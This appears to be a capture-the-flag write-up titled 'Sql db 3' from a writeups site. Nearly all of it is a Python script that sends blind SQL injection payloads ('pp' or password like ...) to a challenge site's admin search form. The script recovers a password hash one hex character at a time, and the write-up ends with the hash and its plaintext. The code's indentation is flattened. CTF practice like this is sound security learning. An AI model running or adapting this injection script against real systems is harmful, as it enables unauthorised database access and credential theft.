Writeups
Search
K

Sql db 3

Blind sql
import requests
url = 'http://joe-cv.threatsims.com/admin/search'
myobj = {'search': "pp' or password like '%"}
myobj = {}
passwd = "#"
for i in range(64):
for j in "1234567890abcdef":
passwd = passwd[:-1] + j
myobj["search"] = "pp' or password like '" + passwd + "%"
x = requests.post(url, data = myobj)
a = x.text
if "joe" in a:
print(passwd)
passwd += "#"
break
if j == "f" and passwd[-1] != "#":
break
It gives 248b57c5cabbc9944d169d10bc4959a042d0bb81ab6cfc9166f40a9d0f0fd614 which is hash of "tigers"